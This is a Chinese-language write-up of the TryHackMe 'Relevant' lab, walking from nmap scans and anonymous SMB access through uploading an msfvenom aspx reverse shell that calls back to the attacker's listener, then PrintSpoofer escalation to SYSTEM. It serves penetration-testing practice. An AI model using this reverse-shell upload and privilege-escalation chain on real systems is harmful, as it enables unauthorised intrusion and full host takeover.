TryHackMe:Relevant
https://tryhackme.com/room/relevant
nmap扫描
port scan
# Nmap 7.93 scan initiated Tue Apr 4 15:55:52 2023 as: nmap --min-rate 10000 -p- -oN nmap/port-scan 10.10.92.194
Nmap scan report for 10.10.92.194
Host is up (0.24s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
# Nmap done at Tue Apr 4 15:56:13 2023 -- 1 IP address (1 host up) scanned in 21.40 seconds
tcp services os scan
# Nmap 7.93 scan initiated Tue Apr 4 15:05:12 2023 as: nmap -sT -sV -O -sC -p80,135,445,3389,49663,49667,49669 -oN nmap/tcp-scan 10.10.133.2
Packet capture filter (device tun0): dst host 10.9.63.59 and (icmp or (tcp and (src host 10.10.133.2)))
OS detection timingRatio() == (1680592051.005 - 1680592050.502) * 1000 / 500 == 1.006
OS detection timingRatio() == (1680592054.178 - 1680592053.675) * 1000 / 500 == 1.006
Nmap scan report for 10.10.133.2
Host is up (0.23s latency).
Scanned at 2023-04-04 15:05:14 CST for 186s
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2023-04-04T07:07:37+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2023-04-03T06:42:56
|_Not valid after: 2023-10-03T06:42:56
|_ssl-date: 2023-04-04T07:08:19+00:00; 0s from scanner time.
49663/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=4/4%OT=80%CT=%CU=%PV=Y%G=N%TM=642BCCE4%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=3%ISR=102%TI=I%II=I%SS=S%TS=A)
OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M508NW8ST11%O6=M508ST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=80%W=2000%O=M508NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-04-04T00:07:38-07:00
| nbstat:
|_ ERROR: Name query failed: TIMEOUT
| smb2-time:
| date: 2023-04-04T07:07:41
|_ start_date: 2023-04-04T06:43:46
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
Read from /usr/bin/../share/nmap: nmap-os-db nmap-service-probes nmap-services.
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 4 15:08:20 2023 -- 1 IP address (1 host up) scanned in 188.57 seconds
udp scan
# Nmap 7.93 scan initiated Tue Apr 4 15:18:31 2023 as: nmap -sU --top-ports 20 -oN nmap/udp-scan 10.10.133.2
Nmap scan report for 10.10.133.2
Host is up (0.21s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
# Nmap done at Tue Apr 4 15:18:37 2023 -- 1 IP address (1 host up) scanned in 6.31 seconds
script scan
# Nmap 7.93 scan initiated Tue Apr 4 15:07:56 2023 as: nmap --script=vuln -p80,135,445,3389,49663,49667,49669 -oN nmap/detaial-scan 10.10.133.2
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.133.2
Host is up (0.24s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
# Nmap done at Tue Apr 4 15:29:36 2023 -- 1 IP address (1 host up) scanned in 1300.49 seconds
通过扫描服务,发现了web服务80端口和49663端口,smb的445端口和rdp的3389端口。
枚举
SMB
# yunki @ yunki in ~ [17:41:58]
$ smbclient -L 10.10.213.217
Password for [WORKGROUP\yunki]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
# yunki @ yunki in ~ [17:46:18]
$ smbclient -N //10.10.213.217/nt4wrksv
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\10.10.213.217\nt4wrksv\
smb: \> ls
. D 0 Sun Jul 26 05:46:04 2020
.. D 0 Sun Jul 26 05:46:04 2020
passwords.txt A 98 Sat Jul 25 23:15:33 2020
get
7735807 blocks of size 4096. 4949211 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
# yunki @ yunki in ~/tryHackMe/Relevant [17:52:51] C:1
$ cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk%
# yunki @ yunki in ~/tryHackMe/Relevant [17:52:53]
$ sed -n "2p" passwords.txt | base64 -d
Bob - !P@$$W0rD!123base64: 无效的输入
# yunki @ yunki in ~/tryHackMe/Relevant [17:53:00] C:1
$ sed -n "3p" passwords.txt | base64 -d
Bill - Juw4nnaM4n420696969!$$$%
通过尝试,发现这两个用户都是虚假的,蜜罐!
那只能去80和49663端口查看一番了。
gobuster
在80端口没有发现内容,但是在49663端口发现了一个目录,如图。这里发现和smb服务的路径名是一样的,这里尝试访问passwords.txt
# yunki @ yunki in ~/tryHackMe/Relevant [18:09:42]
$ curl http://10.10.213.217:49663/nt4wrksv/passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk%
发现可以访问passwords.txt,那这里尝试能不能上传文件,然后通过web访问。
# yunki @ yunki in ~/tryHackMe/Relevant [18:11:24]
$ echo "test" > test.txt
# yunki @ yunki in ~/tryHackMe/Relevant [18:12:08]
$ smbclient -N //10.10.213.217/nt4wrksv
Try "help" to get a list of possible commands.
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average 0.0 kb/s)
# yunki @ yunki in ~/tryHackMe/Relevant [18:11:57]
$ curl http://10.10.213.217:49663/nt4wrksv/test.txt
test
发现成功!那这里上传aspx格式的反弹shell。
getshell
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.63.59 LPORT=443 -f aspx -o pwn.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3427 bytes
Saved as: pwn.aspx
# yunki @ yunki in ~/tryHackMe/Relevant [18:23:36]
$ smbclient -N //10.10.213.217/nt4wrksv
Try "help" to get a list of possible commands.
smb: \> put pwn.aspx
putting file pwn.aspx as \pwn.aspx (4.5 kb/s) (average 4.5 kb/s)
smb: \> exit
# yunki @ yunki in ~/tryHackMe/Relevant [18:27:41] C:130
$ curl http://10.10.213.217:49663/nt4wrksv/pwn.aspx
# yunki @ yunki in ~/tryHackMe/Relevant [18:05:45] C:130
$ sudo nc -lnvp 443
[sudo] yunki 的密码:
listening on [any] 443 ...
connect to [10.9.63.59] from (UNKNOWN) [10.10.213.217] 49905
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
提权
几个月前出现了一个新的漏洞,叫做Printspoofer,它利用了Windows中的一个漏洞,其中某些服务帐户需要使用SeImpersonate特权以更高的权限运行。我们看到我们是iis apppool\defaultapppool服务帐户用户,这应该允许我们使用Printspoofer漏洞进行提升。
使用SMB共享,我们可以将Printspoofer漏洞上传到计算机,导航到C:/inetpub/wwwroot/nt4wrksv目录,并定位它。
# yunki @ yunki in ~/tryHackMe/Relevant [20:19:22] C:4
$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
2023-04-04 20:19:48 (65.8 KB/s) - 已保存 “PrintSpoofer64.exe” [27136/27136])
...
...
smb: \> put PrintSpoofer64.exe
putting file PrintSpoofer64.exe as \PrintSpoofer64.exe (29.2 kb/s) (average 55.7 kb/s)
c:\windows\system32\inetsrv>cd c:\inetpub\wwwroot\nt4wrksv
cd c:\inetpub\wwwroot\nt4wrksv
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>more c:\users\bob\desktop\user.txt
more c:\users\bob\desktop\user.txt
C:\Windows\system32>more C:\users\administrator\desktop\root.txt
more C:\users\administrator\desktop\root.txt
官方walkthrough:https://medium.themayor.tech/relevant-walk-through-on-tryhackme-f7dedfcb00dc
362
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
